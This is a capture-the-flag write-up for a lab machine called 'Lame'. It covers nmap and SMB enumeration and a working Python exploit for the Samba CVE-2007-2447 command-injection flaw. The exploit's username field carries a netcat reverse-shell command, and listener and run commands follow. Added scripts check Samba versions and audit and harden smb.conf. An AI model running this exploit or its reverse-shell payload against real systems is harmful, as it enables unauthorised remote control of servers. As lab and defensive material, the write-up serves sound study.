Lame
OS: Linux
Difficulty: Easy
Points: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.10.10.3 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
The machine has several open ports. Enumerating the SMB ports (139, 445) shows that one of the shared directories is writable.
smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
However, it contains nothing of relevance to us.
smbclient //10.10.10.3/tmp
smb: \> ls
. D 0 Tue Jan 7 01:11:12 2025
.. DR 0 Sat Oct 31 03:33:58 2020
5569.jsvc_up R 0 Mon Jan 6 16:42:26 2025
.ICE-unix DH 0 Mon Jan 6 16:41:21 2025
vmware-root DR 0 Mon Jan 6 16:41:27 2025
.X11-unix DH 0 Mon Jan 6 16:41:49 2025
.X0-lock HR 11 Mon Jan 6 16:41:49 2025
vgauthsvclog.txt.0 R 1600 Mon Jan 6 16:41:20 2025
SMB 3.0.20 - Command Execute (CVE-2007-2447)
After enumerating, we identify that the Samba version running on the server is vulnerable to command execution. We use the following script to exploit the service.
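The version check above is done by eye from the nmap output. As an added example (not part of the original writeup), the script below parses the service lines of an nmap -sV report and flags any Samba whose version falls in the affected range the exploit banner quotes, 3.0.20 up to but not including 3.0.25. The sample output is constructed from the scan shown on this page; the function and constant names are my own.

```python
import re

# Constructed sample: the service lines from the nmap -sV scan shown above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

# A service line: "<port>/<proto> <state> <service> <version text...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Exact Samba version, e.g. "Samba smbd 3.0.20-Debian"; "3.X - 4.X" does not match.
SAMBA_VERSION = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)")

# Affected range for CVE-2007-2447 as quoted in the exploit banner: 3.0.20 <= v < 3.0.25
AFFECTED_LOW = (3, 0, 20)
FIXED = (3, 0, 25)


def parse_nmap_services(text):
    """Return one dict per port line of an nmap -sV report.

    Header, blank and NSE script lines (starting with '|') are skipped.
    """
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        services.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": version.strip(),
        })
    return services


def samba_version(version_text):
    """Return the Samba version as a tuple, or None when nmap only gives a range."""
    m = SAMBA_VERSION.search(version_text)
    return tuple(int(x) for x in m.groups()) if m else None


def flag_cve_2007_2447(services):
    """Return the ports whose exact Samba version lies in the affected range."""
    hits = []
    for s in services:
        v = samba_version(s["version"])
        if v is not None and AFFECTED_LOW <= v < FIXED:
            hits.append(s["port"])
    return hits


if __name__ == "__main__":
    found = parse_nmap_services(NMAP_OUTPUT)
    for s in found:
        print(f"{s['port']}/{s['proto']} {s['service']}: {s['version']}")
    print("Samba in CVE-2007-2447 range on ports:", flag_cve_2007_2447(found))
```

Port 139 is reported only as "3.X - 4.X", so it is left as unknown rather than flagged; only port 445, which nmap pinned to 3.0.20, is reported. The same parser can be pointed at any saved nmap report to build an inventory of exposed service versions.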
Note
The pysmb library must be installed.
pip install pysmb
exploit.py
import sys
from smb.SMBConnection import SMBConnection

if len(sys.argv) != 5:
    print("* CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username map script' Command Execution *\n")
    print("Usage: python3 exploit.py <rhost> <rport> <lhost> <lport>")
    print("Example: python3 exploit.py 10.10.10.10 139 127.0.0.1 4444")
    sys.exit(1)

rhost = sys.argv[1]
rport = int(sys.argv[2])  # pysmb expects the port as an integer
lhost = sys.argv[3]
lport = sys.argv[4]

# Samba hands the supplied username to the 'username map script' without
# sanitising it, so the command between the backticks runs on the server
# during session setup.
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username=username, password='', my_name='', remote_name='')

try:
    print("[...] Sending payload")
    conn.connect(rhost, rport, timeout=10)
except Exception as e:
    # The session setup does not complete normally once the payload has run,
    # so reaching this branch is the expected outcome.
    print("[ + ] You should be getting a shell now.")
    sys.exit(e)
We start our netcat listener.
nc -lvnp 1234
We run the script.
python3 exploit.py 10.10.10.3 139 10.10.14.2 1234
Once it runs we receive our reverse shell; there is no need to escalate privileges.
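From the defensive side, the exploit only works because the server runs an affected Samba build with the username map script option configured, and the foothold was helped by a share that anonymous users can write to. As an added example, not part of the original writeup, the script below parses an smb.conf-style file, reports both weaknesses, and produces a copy with the risky option removed. The configuration text is constructed for the example, and the function names are my own; upgrading Samba to 3.0.25 or later is the actual fix for the CVE.

```python
import re

# Constructed sample smb.conf with the two weaknesses this writeup relies on:
# 'username map script' in [global] and an anonymous, writable [tmp] share.
SMB_CONF_WEAK = """\
[global]
    workgroup = WORKGROUP
    server string = %h server (Samba %v)
    ; the option abused by CVE-2007-2447 on affected Samba versions
    username map script = /etc/samba/scripts/mapusers.sh

[tmp]
    path = /tmp
    comment = oh noes!
    writable = yes
    guest ok = yes
"""

USERNAME_MAP_SCRIPT = re.compile(r"^\s*username\s+map\s+script\s*=", re.IGNORECASE)


def parse_smb_conf(text):
    """Parse smb.conf-style text into {section: {key: value}}.

    Section names and keys are lower-cased; '#' and ';' comments are skipped.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][key.strip().lower()] = value.strip()
    return sections


def share_is_guest_writable(share):
    """True when a share accepts guests and allows writes (either spelling)."""
    yes = lambda k, default: share.get(k, default).lower() == "yes"
    writable = yes("writable", "no") or yes("writeable", "no") or \
        share.get("read only", "yes").lower() == "no"
    return writable and yes("guest ok", "no")


def audit(text):
    """Return (finding, detail) pairs for the weaknesses the writeup exploited."""
    findings = []
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    if "username map script" in glob:
        findings.append(("username map script", glob["username map script"]))
    for name, share in conf.items():
        if name != "global" and share_is_guest_writable(share):
            findings.append(("guest-writable share", name))
    return findings


def harden(text):
    """Return the configuration with every 'username map script' line removed."""
    kept = [line for line in text.splitlines() if not USERNAME_MAP_SCRIPT.match(line)]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for finding, detail in audit(SMB_CONF_WEAK):
        print(f"[!] {finding}: {detail}")
    print("--- hardened ---")
    print(harden(SMB_CONF_WEAK))
```

Removing the option closes the command-execution path on an affected build, but the guest-writable share is still reported after hardening and has to be decided on separately (drop guest ok, or make the share read-only).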